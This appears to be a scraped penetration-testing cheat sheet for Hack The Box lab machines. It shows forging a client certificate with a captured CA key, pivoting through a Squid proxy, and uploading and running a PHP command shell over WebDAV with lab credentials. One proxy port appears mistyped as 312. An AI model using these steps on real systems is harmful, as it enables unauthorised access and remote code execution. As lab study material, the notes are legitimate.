HTTP/HTTPS
HyperText Transfer Protocol - Port 80/443
Generate a TLS
Certificate
With the CA private key already
With the CA private key already
Verify Client Certificate Requirements:
openssl s_client -connect 10.10.10.131:443
Generate the client's private key:
openssl genrsa -out client.key 4096
Create a
certificate signing request (CSR)
, ensure the fields match the server's expectations:
openssl req -new -key client.key -out client.req
Sign the
CSR
with theCA’s private key
to issue aclient certificate
:
openssl x509 -req -in client.req -CA lacasadepapel-htb.pem -CAkey ca.key -set_serial 101 -extensions client -days 365 -outform PEM -out client.cer
Convert the private key and certificate into a
PKCS#12 (.p12)
format file for easy import:
openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
Squid
Proxy
Port 3128
Port 3128
The config file normally lives in
/etc/squid/squid.conf
Relays on
/usr/lib/squid/basic_ncsa_auth
for authentication and the program stores the passwords in/etc/squid/passwords
.Check if you can reverse it to access the local network.
First add the address and port to the last line of your
proxychains.conf
file:
http 10.10.10.67 312
Then, just
nmap
thelocalhost
:
proxychains nmap -n -sT 127.0.0.1
Upstream Proxy Server
Upstream Proxy Server
On
burp
go toSettings > Network > Connections
Create a new rule with
*
for theDestination Host
, set the target proxy as theProxy Host/Port
and set the credentials with basicAuthentication type
.In order to fuzz the
localhost
, set aProxy Listener
, redirect to127.0.0.1:80
and set127.0.0.1:1234
as the interface.Now add the interface to
/etc/proxychains.conf
.
WebDAV
Web Distributed Authoring and Versioning, an extension of the HTTP
protocol that allows users to collaboratively edit and manage files stored on a remote server.
Extends HTTP methods like
GET
andPOST
with additional ones likePROPFIND
,PROPPATCH
,MKCOL
,DELETE
,COPY
,MOVE
, andLOCK
.Credentials can be found at
webdav.passwd
.devtest
can be use for enumeration.
curl --upload-file ./file.php --user <UserName>:<Password> http://10.10.10.67/webdav_test_inception/
curl --data-urlencode 'cmd=id' http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/file.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
davtest.pl -url http://10.10.10.67/webdav_test_inception -auth <UserName>:<Password>
Last updated